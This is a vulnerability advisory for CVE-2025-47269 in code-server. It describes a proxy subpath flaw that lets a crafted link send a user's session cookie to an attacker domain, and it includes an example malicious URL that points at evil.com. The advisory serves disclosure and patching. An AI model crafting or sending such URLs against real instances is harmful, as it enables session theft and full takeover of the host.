CVE-2025-47269 – code-server
Package
Manager: npm
Name: code-server
Vulnerable Version: >=0 <4.99.4
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
EPSS: 0.00068 pctl0.21243
Details
code-server's session cookie can be extracted by having user visit specially crafted proxy URL ### Summary A maliciously crafted URL using the `proxy` subpath can result in the attacker gaining access to the session token. ### Details Failure to properly validate the port for a `proxy` request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token. ### Impact Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to `/proxy`. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. ### Patches Patched versions are from [v4.99.4](https://github.com/coder/code-server/releases/tag/v4.99.4) onward.
Metadata
Created: 2025-05-09T19:34:35Z
Modified: 2025-05-09T21:39:15Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-p483-wpfp-42cj/GHSA-p483-wpfp-42cj.json
CWE IDs: ["CWE-441"]
Alternative ID: GHSA-p483-wpfp-42cj
Finding: F332
Auto approve: 1